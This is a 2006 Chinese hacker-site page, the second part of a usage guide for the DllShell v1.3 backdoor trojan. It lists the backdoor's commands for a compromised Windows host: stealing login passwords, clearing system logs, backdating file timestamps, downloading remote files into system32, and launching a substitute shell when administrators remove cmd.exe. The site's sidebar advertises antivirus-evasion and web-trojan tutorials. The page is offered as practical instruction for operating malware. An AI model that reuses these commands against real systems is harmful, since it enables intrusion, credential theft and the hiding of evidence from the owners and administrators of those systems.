黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 木马天地 >> 文章正文
[推荐]后门木马DllShell v1.3的使用详解
        ★★★★
后门木马DllShell v1.3的使用详解
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-10-26
 
CD/CD.
 显示当前目录
CD..
 返回上级目录
CD <Dir>
 改变当前目录

MD/RD <Dir>
 删除目录

DEL <FileName>
 删除文件

DIR|LS [Pattern]
 显示文件和目录,Pattern支持通配符,例如dir *.exe

--------------------------------------------------------------------------------------

AutoRun -e
 枚举注册表里面的启动项,相当全面.

AutoRun -d <i> <j>
 删除指定启动项目.
 比如,autorun -e, 返回如下信息:

 16.[HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun]
 ------------------------------------------------------------------------
 [0]Internat.exe:
 internat.exe

 用autorun -d 16 0, 即可删除"[0]Internat.exe:"项目

Mouse -l/u
 锁定/解除锁定鼠标指针

Mouse -s/r
 交换/恢复鼠标左右键
 
Assoc
 枚举一些关键扩展名的执行关联,很老的马才会用这招了.
 比如输入assoc, 返回信息如下:
 文件关联:
 -----------------------------
 项目名称 状态(异常标志: ==> )
 -------- ----
 exe文件: "%1" %*
 com文件: "%1" %*
 bat文件: "%1" %*
 cmd文件: "%1" %*
 pif文件: "%1" %*
 scr文件: "%1" /S
 txt文件: ==> n0tepad.exe %1
 ini文件: %SystemRoot%System32NOTEPAD.EXE %1
 inf文件: %SystemRoot%System32NOTEPAD.EXE %1
 reg文件: regedit.exe "%1"

Clog
 清除系统日志(包括应用程序/安全性/系统)

Exec <ExecuteFileName>
 执行可执行文件

FindPass
 查找2k/Nt的用户口令.
 修复Nameless里面findpass的两个bug:
 (system权限不能获取domain/username和只能查找一个winlogon进程的小bug)

FileTime <FileName> <DateTime>
 修改指定文件的创建日期和最后修改时间 到 DateTime指定的时间
 DataTime的格式为yyyymmddhhmmss,如20060524152307
 注:可以修改具有只读,隐藏,系统属性的文件时间

Help|?
 帮助

LockPC
 锁定工作站的桌面

Shell [CmdFile]
 打开CMD命令行,如果CmdFile未指定,默认为cmd.exe
 如果管理员删除了cmd.exe,或者修改了cmd.exe的权限;
 你可以先wget个自己的mycmd.exe,然后Shell mycmd.exe即可

Shield <On|Off>
 恢复/挂起自我保护线程,如果要卸载后门,请先Shield Off

SysInfo
 收集系统配置信息,比较详细:-)
 比如sysinfo, 返回信息如下:
 系统信息
 --------------------------------------
 系统版本: Microsoft Windows 2000 Advance Server Service Pack 4.0(Build 2195)
 产品ID: 52273-005-6861993-09773
 安装路径: H:WIN2000PROI386
 安装时间: 2046-1-20, 15:22:56
 注册组织: Microsoft
 注册用户: BillGates
 主机名: WEB_SERVER
 Windows目录: C:WINNT
 系统目录: C:WINNTsystem32

 CPU个数: 1个
 CPU[0]: Intel(R) Pentium(R) 4 CPU 2.40GHz频率: 2391MHz
 内存容量: 255MB Total, 31MB Free.
 显示属性: 1024 x 768, 刷新率: 85Hz, 色深: 32bit
 运行时间: 0天 00:10:32

 盘符[卷标] 驱动器|文件系统 总大小|可用空间 百分比
 -----------------------------------------------------------------------------
 C:| 硬盘|NTFS 12001MB| 92MB 11.7G| 0.1G 0.8%
 D:|本地磁盘 硬盘|FAT32 15633MB| 125MB 15.3G| 0.1G 0.8%
 E:| 硬盘|FAT32 15633MB| 93MB 15.3G| 0.1G 0.6%
 F:| 硬盘|FAT32 15633MB| 3708MB 15.3G| 3.6G 23.7%
 G:|本地磁盘 硬盘|FAT32 15610MB| 59MB 15.2G| 0.1G 0.4%
 H:| 光驱|无碟 0MB| 0MB 0.0G| 0.0G 0.0%
 I:| 网络驱动器| 0MB| 0MB 0.0G| 0.0G 0.0%

 硬盘总容量: 74513MB|72.8G
 剩余空间: 4078MB|4.0G
 可用百分比: 5.5%

 本机IP
 --------------------------------------
 IP[0]: 192.168.0.1

Wget <URL> [SaveFileName]
 Http下载文件到system32目录下面,
 注意URL前面要加上<a href="http://" target="_blank">http://</a>
 如果SaveFileName没指定,则使用URL里面的文件名
 比如, wget <a href="http://192.168.0.2/cmd.exe" target="_blank">http://192.168.0.2/cmd.exe</a> mycmd.exe 则保存的文件名为mycmd.exe
 wget <a href="http://192.168.0.2/cmd.exe 则保存的文件名为cmd.exe" target="_blank">http://192.168.0.2/cmd.exe 则保存的文件名为cmd.exe</a>

Quit|Exit
 退出Dllshell.

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    2007年IE 0day 网马04-02
    修改特征码打造免杀后门之灰鸽子04-02
    挂马代码大全03-22
    打造不死的asp木马03-21
    木马免杀原理详解01-31
    新编MS07004网页木马源码01-27
    灰鸽子VIP2006服务端过各种杀毒软01-26
    木马免杀之加壳与改入口点法01-23
    灰鸽子超级详细教程(看了就会)01-16
    灰鸽子远程管理软件新手技术手册12-27
    二个非常规ASP木马12-13
    木马免杀浓缩精华版教程不看后悔12-05
    相 关 文 章
  • php后门插在图片里执行回显思路

  • 金睛火眼—进程中判断出病毒和木马

  • 修改特征码打造免杀后门之灰鸽子篇

  • windows自带的rcmd后门使用方法整理

  • 如何防御网络游戏外挂木马

  • 躲避ScanWebShell的一个后门

  • 打造不死的asp木马

  • 木马驻留系统的几种方式

  • windows自带的rcmd后门使用方法整理

  • 最新.aspx微型后门代码

  • 如何清除"雨薇在线"木马

  • 木马 ctfnom.exe TIMPlatform.exe TIMP

  • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886